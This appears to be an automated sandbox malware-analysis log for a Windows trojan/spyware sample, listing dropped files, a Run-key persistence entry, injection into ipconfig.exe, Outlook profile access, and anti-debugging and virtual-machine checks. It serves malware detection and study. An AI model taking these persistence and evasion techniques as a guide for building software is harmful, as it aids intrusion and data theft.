Source: C:\Users\user\AppData\Local\Temp\iscan.exe File created: C:\Users\user\AppData\Roaming\iidryiceixqa Jump to behavior
Source: C:\Users\user\Desktop\PrWP76ejHO.exe File created: C:\Users\user\AppData\Local\Temp\nsd4ECF.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/14@4/4
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00402036 CoCreateInstance,MultiByteToWideChar, 0_2_00402036
Source: C:\Users\user\Desktop\PrWP76ejHO.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_004043F5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_004043F5
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5872:120:WilError_01
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4468
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4864
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1836:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\ipconfig.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: ipconfig.pdb source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ipconfig.pdbGCTL source: iscan.exe, 00000003.00000002.359559716.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, iscan.exe, 00000003.00000002.359328170.0000000000767000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: iscan.exe, 00000001.00000003.250447257.00000000028E0000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000001.00000003.251103890.0000000002A70000.00000004.00001000.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: iscan.exe, iscan.exe, 00000003.00000003.252292538.00000000005D0000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.360968796.0000000000B1F000.00000040.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000003.253843942.000000000086B000.00000004.00000800.00020000.00000000.sdmp, iscan.exe, 00000003.00000002.359594597.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.511826936.0000000002EEF000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000002.510619896.0000000002DD0000.00000040.00000800.00020000.00000000.sdmp, ipconfig.exe, 00000016.00000003.357567203.00000000004E8000.00000004.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040AC36 push ecx; ret 1_2_0040AC49
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0041B1E9 push esp; retf 3_2_0041B1F1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004212DC push eax; ret 3_2_0042132F
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0040EA97 push eax; retf 3_2_0040EACF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00421329 push eax; ret 3_2_0042132F
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00421332 push eax; ret 3_2_00421399
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00421393 push eax; ret 3_2_00421399
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00421449 push dword ptr [2957D30Eh]; ret 3_2_004219AF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00419F22 pushad ; retf 3_2_00419F37
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A7D0D1 push ecx; ret 3_2_00A7D0E4

Persistence and Installation Behavior
barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Drops PE files
Source: C:\Users\user\Desktop\PrWP76ejHO.exe File created: C:\Users\user\AppData\Local\Temp\iscan.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\iscan.exe File created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run oipsxnj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run oipsxnj Jump to behavior
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A56A60 rdtscp 3_2_00A56A60
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\iscan.exe API coverage: 9.7 %
Source: C:\Users\user\AppData\Local\Temp\iscan.exe API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 0_2_00405620
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00405FF6 FindFirstFileA,FindClose, 0_2_00405FF6
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00402654 FindFirstFileA, 0_2_00402654
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_00410310 FindFirstFileExW, 1_2_00410310
Source: C:\Users\user\Desktop\PrWP76ejHO.exe API call chain: ExitProcess graph end node
Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
Source: explorer.exe, 00000004.00000000.333529858.0000000007166000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.268461375.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
Source: explorer.exe, 00000004.00000000.268927273.00000000090D8000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
Source: explorer.exe, 00000004.00000000.330583659.0000000005063000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
Source: explorer.exe, 00000004.00000000.268461375.0000000008FD3000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040A9DF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_0040A9DF
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_004126DA GetProcessHeap, 1_2_004126DA
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A56A60 rdtscp 3_2_00A56A60
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040ED18 mov eax, dword ptr fs:[00000030h] 1_2_0040ED18
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_004113BB mov eax, dword ptr fs:[00000030h] 1_2_004113BB
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0045007A mov eax, dword ptr fs:[00000030h] 1_2_0045007A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_00450005 mov eax, dword ptr fs:[00000030h] 1_2_00450005
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_00450019 mov eax, dword ptr fs:[00000030h] 1_2_00450019
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_00450149 mov eax, dword ptr fs:[00000030h] 1_2_00450149
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A520A0 mov eax, dword ptr fs:[00000030h] 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A690AF mov eax, dword ptr fs:[00000030h] 3_2_00A690AF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5F0BF mov ecx, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5F0BF mov eax, dword ptr fs:[00000030h] 3_2_00A5F0BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A29080 mov eax, dword ptr fs:[00000030h] 3_2_00A29080
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h] 3_2_00AA3884
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA3884 mov eax, dword ptr fs:[00000030h] 3_2_00AA3884
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00A4B8E4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B8E4 mov eax, dword ptr fs:[00000030h] 3_2_00A4B8E4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h] 3_2_00A240E1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h] 3_2_00A240E1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A240E1 mov eax, dword ptr fs:[00000030h] 3_2_00A240E1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A258EC mov eax, dword ptr fs:[00000030h] 3_2_00A258EC
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ABB8D0 mov eax, dword ptr fs:[00000030h] 3_2_00ABB8D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5002D mov eax, dword ptr fs:[00000030h] 3_2_00A5002D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3B02A mov eax, dword ptr fs:[00000030h] 3_2_00A3B02A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h] 3_2_00A4A830
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h] 3_2_00A4A830
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h] 3_2_00A4A830
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A830 mov eax, dword ptr fs:[00000030h] 3_2_00A4A830
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h] 3_2_00AF4015
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF4015 mov eax, dword ptr fs:[00000030h] 3_2_00AF4015
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA7016 mov eax, dword ptr fs:[00000030h] 3_2_00AA7016
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF1074 mov eax, dword ptr fs:[00000030h] 3_2_00AF1074
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2073 mov eax, dword ptr fs:[00000030h] 3_2_00AE2073
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h] 3_2_00A40050
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A40050 mov eax, dword ptr fs:[00000030h] 3_2_00A40050
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h] 3_2_00A561A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A561A0 mov eax, dword ptr fs:[00000030h] 3_2_00A561A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AE49A4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AE49A4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AE49A4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE49A4 mov eax, dword ptr fs:[00000030h] 3_2_00AE49A4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA69A6 mov eax, dword ptr fs:[00000030h] 3_2_00AA69A6
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AA51BE mov eax, dword ptr fs:[00000030h] 3_2_00AA51BE
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov ecx, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF mov eax, dword ptr fs:[00000030h] 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5A185 mov eax, dword ptr fs:[00000030h] 3_2_00A5A185
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4C182 mov eax, dword ptr fs:[00000030h] 3_2_00A4C182
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52990 mov eax, dword ptr fs:[00000030h] 3_2_00A52990
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A2B1E1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AB41E8 mov eax, dword ptr fs:[00000030h] 3_2_00AB41E8
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A44120 mov eax, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A44120 mov ecx, dword ptr fs:[00000030h] 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h] 3_2_00A5513A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5513A mov eax, dword ptr fs:[00000030h] 3_2_00A5513A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A29100 mov eax, dword ptr fs:[00000030h] 3_2_00A29100
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2C962 mov eax, dword ptr fs:[00000030h] 3_2_00A2C962
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2B171 mov eax, dword ptr fs:[00000030h] 3_2_00A2B171
